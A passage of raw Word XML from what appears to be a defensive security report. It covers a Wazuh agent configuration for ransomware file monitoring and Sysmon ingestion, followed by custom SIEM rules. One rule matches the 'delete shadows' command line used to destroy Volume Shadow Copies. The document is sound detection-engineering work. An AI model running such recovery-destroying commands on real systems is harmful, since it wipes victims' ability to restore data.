        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">time-reconnect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;60&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">time-reconnect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">auto_restart</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;yes&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">auto_restart</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">crypto_method</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;aes&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">crypto_method</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!-- Real-Time Ransomware FIM on Protected Enterprise Share --&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">syscheck</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">disabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;no&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">disabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">frequency</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;300&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">frequency</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">scan_on_start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;yes&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">scan_on_start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">directories</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">check_all=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"yes"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">realtime=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"yes"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">report_changes=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"yes"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;C:\Finance&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">directories</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">syscheck</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!-- Windows Event Channels --&gt;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location</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;Application&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">location</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">log_format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;eventchannel&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">log_format</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location</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;Security&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">location</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">log_format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;eventchannel&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">log_format</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location</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;System&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">location</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">log_format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;eventchannel&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">log_format</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!-- Sysmon Ingestion --&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">localfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">location</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;Microsoft-Windows-Sysmon/Operational&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">location</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">log_format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;eventchannel&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">log_format</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">localfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ossec_config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_e0fd6af048387aebe86a3edb39c54c207ab3431"/>
      <w:r>
        <w:t xml:space="preserve">4. Detection Engineering &amp; Custom SIEM Rules</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To satisfy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Module 3: Incident Detection Optimization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, custom correlation rules were defined in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/ossec/etc/rules/local_rules.xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">on the Wazuh Manager to flag ransomware behaviors that default signatures miss.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_63026d9090b3000ffaa8b91a397dc12fa65b6ec"/>
      <w:r>
        <w:t xml:space="preserve">4.1 Custom Correlation Rule Definitions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!-- Custom Detection Rules for Multi-Stage Ransomware Attacks --&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">group</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">name=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"windows,sysmon,ransomware,"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!-- Rule 100100: Shadow Copy Destruction (T1490) --&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">rule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">id=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"100100"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">level=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"14"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if_group</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;sysmon_event1&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if_group</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">field</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">name=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"win.eventdata.commandLine"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;delete shadows&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">field</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">description</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;CRITICAL: Ransomware Behavior Detected - Volume Shadow Copies Deletion (MITRE T1490)&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">description</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mitre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;T1490&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mitre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">group</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;ransomware,system_recovery,&lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">group</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">rule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!-- Rule 100101: BCDedit Boot Recovery Disabling (T1490) --&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">rule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">id=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"100101"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">level=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"12"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
